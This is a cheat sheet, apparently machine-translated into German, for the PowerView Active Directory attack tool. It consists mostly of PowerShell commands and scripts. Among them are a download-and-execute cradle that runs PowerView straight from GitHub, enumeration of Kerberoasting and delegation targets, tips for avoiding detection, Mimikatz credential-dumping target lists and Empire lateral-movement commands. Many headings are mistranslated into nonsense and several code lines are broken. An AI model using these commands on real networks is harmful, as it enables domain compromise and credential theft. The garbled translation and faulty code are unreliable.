PowerView Active Directory Enumeration Tool Cheat Sheet

generieren

Überblick

PowerView ist eine Power Shell-Tool entwickelt von Will Schroeder (@harmj0y) im Rahmen des PowerSploit-Rahmens. Es ist für Active Directory-Enumeration und Ausbeutung konzipiert und bietet umfangreiche Funktionalität für Domänenaufklärung, Privileg Escalation Pfad Entdeckung und Angriff Vektor-Identifikation in Windows-Umgebungen.

ZEIT Warnung: Dieses Tool ist nur für autorisierte Penetrationstests und Sicherheitsbewertungen gedacht. Stellen Sie sicher, dass Sie eine ordnungsgemäße Genehmigung vor der Verwendung in jeder Umgebung haben.

Installation

PowerSploit Installation

```powershell

Download PowerSploit

Invoke-WebRequest -Uri "https://github.com/PowerShellMafia/PowerSploit/archive/master.zip" -OutFile "PowerSploit.zip" Expand-Archive -Path "PowerSploit.zip" -DestinationPath "C:\Tools\"

Import PowerView

Import-Module C:\Tools\PowerSploit-master\Recon\PowerView.ps1

Alternative direct import

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1') ```_

Standalone Power Blick

```powershell

Download standalone PowerView

Invoke-WebRequest -Uri "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1" -OutFile "PowerView.ps1"

Import PowerView

Import-Module .\PowerView.ps1

Or execute directly

. .\PowerView.ps1 ```_

Dev Branch (Letzte Funktionen)

```powershell

Download dev branch (more features)

Invoke-WebRequest -Uri "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1" -OutFile "PowerView-dev.ps1" Import-Module .\PowerView-dev.ps1 ```_

Basisnutzung

Modul laden und helfen

```powershell

Import PowerView

Import-Module PowerView.ps1

Get all PowerView commands

Get-Command -Module PowerView

Get help for specific function

Get-Help Get-DomainUser -Full

List all PowerView functions

Get-Command -Domain Get-Command -Net ```_

Grundlegende Domain Information

```powershell

Get current domain

Get-Domain

Get domain controllers

Get-DomainController

Get domain policy

Get-DomainPolicy

Get domain trusts

Get-DomainTrust

Get forest information

Get-Forest ```_

Domain Enumeration

Benutzeraufzählung

```powershell

Get all domain users

Get-DomainUser

Get specific user

Get-DomainUser -Identity administrator

Get users with specific properties

Get-DomainUser -Properties samaccountname,description,pwdlastset

Get users with SPN set (Kerberoastable)

Get-DomainUser -SPN

Get users with pre-authentication disabled (AS-REP Roastable)

Get-DomainUser -PreauthNotRequired

Get privileged users

Get-DomainUser -AdminCount

Get users with passwords not required

Get-DomainUser -PasswordNotRequired ```_

Gruppenaufzählung

```powershell

Get all domain groups

Get-DomainGroup

Get specific group

Get-DomainGroup -Identity "Domain Admins"

Get group members

Get-DomainGroupMember -Identity "Domain Admins"

Get groups for specific user

Get-DomainGroup -UserName administrator

Get local groups on machines

Get-NetLocalGroup -ComputerName server01

Get local group members

Get-NetLocalGroupMember -ComputerName server01 -GroupName Administrators ```_

Computeraufzählung

```powershell

Get all domain computers

Get-DomainComputer

Get computers with specific OS

Get-DomainComputer -OperatingSystem "Server 2019"

Get computer properties

Get-DomainComputer -Properties dnshostname,operatingsystem,lastlogontimestamp

Get computers with unconstrained delegation

Get-DomainComputer -UnconstrainedDelegation

Get computers with constrained delegation

Get-DomainComputer -TrustedToAuth

Get domain controllers

Get-DomainComputer -Properties dnshostname|Where-Object \\{$.dnshostname -like "dc"\\} ```

Service Principal Name (SPN) Enumeration

```powershell

Get all SPNs

Get-DomainUser -SPN|Select-Object samaccountname,serviceprincipalname

Get specific SPN types

Get-DomainUser -SPN|Where-Object \\{$_.serviceprincipalname -like "SQL"\\}

Get SPNs for specific service

Get-DomainUser -SPN|Where-Object \\{$_.serviceprincipalname -like "HTTP"\\}

Get unique SPN services

| Get-DomainUser -SPN | ForEach-Object \\{$.serviceprincipalname\\} | ForEach-Object \\{$.split('/')[0]\\} | Sort-Object -Unique | ```_

Netzwerkaufzählung

Sitzungsnummer

```powershell

Get sessions on local machine

Get-NetSession

Get sessions on remote machine

Get-NetSession -ComputerName server01

Get sessions for all domain computers

Get-DomainComputer|ForEach-Object \\{Get-NetSession -ComputerName $_.dnshostname\\}

Get logged on users

Get-NetLoggedon -ComputerName server01

Get locally logged on users

Get-NetLoggedon -ComputerName server01 -LocalOnly ```_

Aktienzählung

```powershell

Get shares on local machine

Get-NetShare

Get shares on remote machine

Get-NetShare -ComputerName server01

Get shares for all domain computers

Get-DomainComputer|ForEach-Object \\{Get-NetShare -ComputerName $_.dnshostname\\}

Find interesting shares

Find-DomainShare

Find readable shares

Find-DomainShare -CheckShareAccess ```_

Prozesszählung

```powershell

Get processes on remote machine

Get-NetProcess -ComputerName server01

Get processes for specific user

Get-NetProcess -ComputerName server01|Where-Object \\{$_.owner -like "administrator"\\}

Get processes across domain

Get-DomainComputer|ForEach-Object \\{Get-NetProcess -ComputerName $.dnshostname\\} ```

Zugriffskontrolle und Berechtigungen

ACL Enumeration

```powershell

Get ACLs for domain object

Get-DomainObjectAcl -Identity "Domain Admins"

Get ACLs with specific rights

Get-DomainObjectAcl -Identity "Domain Admins" -ResolveGUIDs

Find interesting ACLs

Find-InterestingDomainAcl

Get ACLs for specific user

Get-DomainObjectAcl -Identity administrator -ResolveGUIDs

Find objects with specific ACE

Get-DomainObjectAcl|Where-Object \\{$.SecurityIdentifier -eq "S-1-5-21-..."\\} ```

Genehmigungsanalyse

```powershell

Find objects modifiable by current user

Find-InterestingDomainAcl -ResolveGUIDs|Where-Object \\{$_.IdentityReferenceName -like "$env:USERNAME"\\}

Find GenericAll permissions

Get-DomainObjectAcl -ResolveGUIDs|Where-Object \\{$_.ActiveDirectoryRights -like "GenericAll"\\}

Find WriteDacl permissions

Get-DomainObjectAcl -ResolveGUIDs|Where-Object \\{$_.ActiveDirectoryRights -like "WriteDacl"\\}

Find WriteOwner permissions

Get-DomainObjectAcl -ResolveGUIDs|Where-Object \\{$.ActiveDirectoryRights -like "WriteOwner"\\} ```

Trust und Forest Enumeration

Domain Trust Analyse

```powershell

Get domain trusts

Get-DomainTrust

Get forest trusts

Get-ForestTrust

Map domain trusts

Get-DomainTrustMapping

Get external trusts

Get-DomainTrust -API|Where-Object \\{$_.trust_type -eq "TRUST_TYPE_EXTERNAL"\\}

Get bidirectional trusts

Get-DomainTrust|Where-Object \\{$.TrustDirection -eq "Bidirectional"\\} ```

Kreuz-Domain-Enumeration

```powershell

Enumerate users in trusted domain

Get-DomainUser -Domain trusted.domain.com

Enumerate groups in trusted domain

Get-DomainGroup -Domain trusted.domain.com

Get foreign group members

Get-DomainForeignGroupMember

Get foreign users

Get-DomainForeignUser ```_

Vorrechte Eskalation Pfade

Zugang zum Admin

```powershell

Find local admin access

Find-LocalAdminAccess

Test local admin access on specific machine

Test-AdminAccess -ComputerName server01

Find machines where current user has local admin

Get-DomainComputer|ForEach-Object \\{Test-AdminAccess -ComputerName $_.dnshostname\\}

Find machines where domain users have local admin

Find-DomainLocalGroupMember -GroupName Administrators ```_

Delegationsanalyse

```powershell

Find unconstrained delegation

Get-DomainComputer -UnconstrainedDelegation

Find constrained delegation

Get-DomainUser -TrustedToAuth Get-DomainComputer -TrustedToAuth

Find resource-based constrained delegation

| Get-DomainComputer | Get-DomainObjectAcl -ResolveGUIDs | Where-Object \\{$.ObjectAceType -eq "ms-DS-Allowed-To-Act-On-Behalf-Of-Other-Identity"\\} | ```

Kerberoasting Ziele

```powershell

Find Kerberoastable users

Get-DomainUser -SPN

Get detailed Kerberoasting targets

Get-DomainUser -SPN|Select-Object samaccountname,serviceprincipalname,pwdlastset,lastlogon

Find high-value Kerberoasting targets

Get-DomainUser -SPN -AdminCount

Find Kerberoastable users with old passwords

Get-DomainUser -SPN|Where-Object \\{$.pwdlastset -lt (Get-Date).AddDays(-365)\\} ```

Attack Vector Discovery

Bluthochdruck Datenerhebung

```powershell

Collect data for BloodHound (requires SharpHound)

PowerView can supplement BloodHound data collection

Get user sessions for BloodHound

Get-DomainComputer|ForEach-Object \\{ $computer = $.dnshostname $sessions = Get-NetSession -ComputerName $computer foreach ($session in $sessions) \\{ [PSCustomObject]@\\{ Computer = $computer User = $session.sesi10_username Source = $session.sesi10_cname \\} \\} \\} ```

Seitliche Bewegungswege

```powershell

Find computers with sessions from high-value users

$highValueUsers = Get-DomainGroupMember -Identity "Domain Admins"|Select-Object -ExpandProperty MemberName Get-DomainComputer|ForEach-Object \\{ $computer = $_.dnshostname $sessions = Get-NetLoggedon -ComputerName $computer foreach ($session in $sessions) \\{ if ($highValueUsers -contains $session.wkui1_username) \\{ Write-Output "High-value user $($session.wkui1_username) logged on to $computer" \\} \\} \\}

Find shortest path to Domain Admins

Find-DomainUserLocation -UserGroupIdentity "Domain Admins" ```_

Fortgeschrittene Zähltechniken

LDAP Quers

```powershell

Custom LDAP queries

Get-DomainUser -LDAPFilter "(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=32))"

Find users with specific attributes

Get-DomainUser -LDAPFilter "(&(objectCategory=person)(objectClass=user)(description=*))"

Find computers with specific OS

Get-DomainComputer -LDAPFilter "(&(objectCategory=computer)(operatingSystem=Server))"

Find groups with specific names

Get-DomainGroup -LDAPFilter "(&(objectCategory=group)(name=admin))" ```_

GPO Aufzählung

```powershell

Get all GPOs

Get-DomainGPO

Get GPOs applied to specific OU

Get-DomainGPO -ComputerIdentity "OU=Servers,DC=domain,DC=com"

Find interesting GPO settings

Get-DomainGPOLocalGroup

Get GPO computer local group settings

Get-DomainGPOComputerLocalGroupMapping

Find GPOs with specific settings

Get-DomainGPO|Where-Object \\{$.displayname -like "password"\\} ```

OU und Containeranalyse

```powershell

Get all OUs

Get-DomainOU

Get objects in specific OU

Get-DomainComputer -SearchBase "OU=Servers,DC=domain,DC=com"

Get OU ACLs

Get-DomainOU|Get-DomainObjectAcl -ResolveGUIDs

Find interesting OU permissions

| Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs | Where-Object \\{$.ActiveDirectoryRights -like "GenericAll"\\} | ```

Stealth und Evasion

Detection vermeiden

```powershell

Use alternate credentials

$cred = Get-Credential Get-DomainUser -Credential $cred

Use specific domain controller

Get-DomainUser -Server dc02.domain.com

Limit queries to avoid detection

Get-DomainUser -ResultPageSize 100

Use LDAPS for encrypted queries

Get-DomainUser -Server dc01.domain.com -ServerTimeLimit 30 ```_

Minimaler Footprint Aufzählung

```powershell

Essential enumeration with minimal queries

$domain = Get-Domain $domainAdmins = Get-DomainGroupMember -Identity "Domain Admins" $spnUsers = Get-DomainUser -SPN $computers = Get-DomainComputer -Properties dnshostname,operatingsystem

Targeted enumeration

$targetUsers = @("administrator", "service_account", "backup_admin") foreach ($user in $targetUsers) \\{ Get-DomainUser -Identity $user \\} ```_

Automatisierung und Reporting

Umfassende Domain-Bewertung

```powershell

Comprehensive domain assessment script

param( [string]$OutputPath = "C:\Temp\DomainAssessment", [string]$Domain = $env:USERDOMAIN )

Create output directory

New-Item -ItemType Directory -Path $OutputPath -Force|Out-Null

Write-Host "[+] Starting comprehensive domain assessment for $Domain"

Domain information

Write-Host "[+] Gathering domain information..." Get-Domain|Out-File "$OutputPath\domain_info.txt" Get-DomainController|Out-File "$OutputPath\domain_controllers.txt" Get-DomainTrust|Out-File "$OutputPath\domain_trusts.txt"

User enumeration

Write-Host "[+] Enumerating users..." Get-DomainUser|Export-Csv "$OutputPath\domain_users.csv" -NoTypeInformation Get-DomainUser -SPN|Export-Csv "$OutputPath\spn_users.csv" -NoTypeInformation Get-DomainUser -AdminCount|Export-Csv "$OutputPath\privileged_users.csv" -NoTypeInformation

Group enumeration

Write-Host "[+] Enumerating groups..." Get-DomainGroup|Export-Csv "$OutputPath\domain_groups.csv" -NoTypeInformation Get-DomainGroupMember -Identity "Domain Admins"|Export-Csv "$OutputPath\domain_admins.csv" -NoTypeInformation

Computer enumeration

Write-Host "[+] Enumerating computers..." Get-DomainComputer|Export-Csv "$OutputPath\domain_computers.csv" -NoTypeInformation Get-DomainComputer -UnconstrainedDelegation|Export-Csv "$OutputPath\unconstrained_delegation.csv" -NoTypeInformation

Write-Host "[+] Enumerating shares..." Find-DomainShare|Export-Csv "$OutputPath\domain_shares.csv" -NoTypeInformation

ACL analysis

Write-Host "[+] Analyzing ACLs..." Find-InterestingDomainAcl -ResolveGUIDs|Export-Csv "$OutputPath\interesting_acls.csv" -NoTypeInformation

Write-Host "[+] Assessment complete. Results saved to $OutputPath" ```_

Vorrechte Eskalation Path Discovery

```powershell

Privilege escalation path discovery script

param( [string]$TargetUser = "administrator", [string]$OutputPath = "C:\Temp\PrivEscPaths" )

New-Item -ItemType Directory -Path $OutputPath -Force|Out-Null

Write-Host "[+] Discovering privilege escalation paths to $TargetUser"

Find local admin access

Write-Host "[+] Finding local admin access..." $localAdminAccess = Find-LocalAdminAccess $localAdminAccess|Out-File "$OutputPath\local_admin_access.txt"

Find user sessions

Write-Host "[+] Finding user sessions..." $userSessions = Get-DomainComputer|ForEach-Object \\{ $computer = $_.dnshostname try \\{ $sessions = Get-NetSession -ComputerName $computer -ErrorAction SilentlyContinue foreach ($session in $sessions) \\{ [PSCustomObject]@\\{ Computer = $computer User = $session.sesi10_username Source = $session.sesi10_cname \\} \\} \\} catch \\{\\} \\} $userSessions|Export-Csv "$OutputPath\user_sessions.csv" -NoTypeInformation

Find Kerberoastable users

Write-Host "[+] Finding Kerberoastable users..." $kerberoastable = Get-DomainUser -SPN $kerberoastable|Export-Csv "$OutputPath\kerberoastable_users.csv" -NoTypeInformation

Find delegation opportunities

Write-Host "[+] Finding delegation opportunities..." $delegation = @() $delegation += Get-DomainComputer -UnconstrainedDelegation|Select-Object @\\{Name="Type";Expression=\\{"Unconstrained"\\}\\}, @\\{Name="Object";Expression=\\{$.dnshostname\\}\\} $delegation += Get-DomainUser -TrustedToAuth|Select-Object @\\{Name="Type";Expression=\\{"Constrained"\\}\\}, @\\{Name="Object";Expression=\\{$.samaccountname\\}\\} $delegation|Export-Csv "$OutputPath\delegation_opportunities.csv" -NoTypeInformation

Write-Host "[+] Privilege escalation path discovery complete" ```_

Netzwerk Mapping Skript

```powershell

Network mapping script

param( [string]$OutputPath = "C:\Temp\NetworkMapping" )

New-Item -ItemType Directory -Path $OutputPath -Force|Out-Null

Write-Host "[+] Starting network mapping"

Get all computers

$computers = Get-DomainComputer -Properties dnshostname,operatingsystem

Map shares

Write-Host "[+] Mapping shares..." $allShares = @() foreach ($computer in $computers) \\{ try \\{ $shares = Get-NetShare -ComputerName $computer.dnshostname -ErrorAction SilentlyContinue foreach ($share in $shares) \\{ $allShares += [PSCustomObject]@\\{ Computer = $computer.dnshostname ShareName = $share.shi1_netname ShareType = $share.shi1_type Remark = $share.shi1_remark \\} \\} \\} catch \\{\\} \\} $allShares|Export-Csv "$OutputPath\network_shares.csv" -NoTypeInformation

Map sessions

Write-Host "[+] Mapping sessions..." $allSessions = @() foreach ($computer in $computers) \\{ try \\{ $sessions = Get-NetSession -ComputerName $computer.dnshostname -ErrorAction SilentlyContinue foreach ($session in $sessions) \\{ $allSessions += [PSCustomObject]@\\{ Computer = $computer.dnshostname User = $session.sesi10_username Source = $session.sesi10_cname Time = $session.sesi10_time \\} \\} \\} catch \\{\\} \\} $allSessions|Export-Csv "$OutputPath\network_sessions.csv" -NoTypeInformation

Write-Host "[+] Network mapping complete" ```_

Integration mit anderen Tools

BlutHound Integration

```powershell

Supplement BloodHound data with PowerView

Get additional session data

$sessions = Get-DomainComputer|ForEach-Object \\{ Get-NetSession -ComputerName $_.dnshostname \\}

Get additional local group data

$localGroups = Get-DomainComputer|ForEach-Object \\{ Get-NetLocalGroupMember -ComputerName $_.dnshostname -GroupName Administrators \\}

Export for BloodHound custom queries

Mimikatz Integration

```powershell

Find targets for Mimikatz

$highValueSessions = Get-DomainComputer|ForEach-Object \\{ $computer = $.dnshostname $sessions = Get-NetLoggedon -ComputerName $computer $sessions|Where-Object \\{$.wkui1_username -in @("administrator", "domain admin", "enterprise admin")\\} \\}

Output targets for credential dumping

| $highValueSessions | Select-Object Computer, User | Export-Csv "mimikatz_targets.csv" -NoTypeInformation | ```_

Integrieren der Welt

```powershell

Generate target list for Empire

$targets = Find-LocalAdminAccess $targets|ForEach-Object \\{ Write-Output "usemodule lateral_movement/invoke_psexec" Write-Output "set ComputerName $" Write-Output "execute" \\} ```

Fehlerbehebung

Gemeinsame Themen

```powershell

LDAP query failures

Check domain connectivity

Test-NetConnection -ComputerName (Get-Domain).PdcRoleOwner -Port 389

Permission issues

Check current user context

whoami /groups

Network connectivity

Test WMI access

Get-WmiObject -Class Win32_OperatingSystem -ComputerName server01

DNS resolution

Test name resolution

Resolve-DnsName domain.com ```_

Debug Mode

```powershell

Enable verbose output

$VerbosePreference = "Continue"

Test specific functions

Get-DomainUser -Identity administrator -Verbose

Check LDAP queries

Get-DomainUser -LDAPFilter "(samaccountname=administrator)" -Verbose ```_

Best Practices

Operationelle Sicherheit

** Verwenden Sie legitime Konten*: Vermeiden Sie verdächtige Servicekonten
*Limit-Abfragen: Fluten Sie Domain-Controller nicht mit Anfragen
** Spezifische Ziele verwenden*: Zielspezifische Objekte anstatt breite Aufzählung
*Clean up: Entfernen Sie alle erstellten Objekte oder modifizierten ACLs
*Monitor logs: Bewusstsein für generierte Sicherheitsereignisse

Aufzählungsstrategie

```powershell

Phased approach

Phase 1: Basic domain information

Get-Domain Get-DomainController

Phase 2: User and group enumeration

Get-DomainUser -Properties samaccountname,description Get-DomainGroup -Properties samaccountname,description

Phase 3: Privilege analysis

Get-DomainUser -AdminCount Find-InterestingDomainAcl

Phase 4: Attack vector identification

Get-DomainUser -SPN Find-LocalAdminAccess ```_

Ressourcen

PowerView GitHub Repository)
PowerSploit Dokumentation
[Active Directory Security](LINK_5
[SpecterOps Blog](_LINK_5__

--

*Dieses Betrügereiblatt bietet eine umfassende Referenz für die Nutzung von PowerView. Stellen Sie immer sicher, dass Sie eine ordnungsgemäße Autorisierung vor der Durchführung von Active Directory Sicherheitsbewertungen haben. *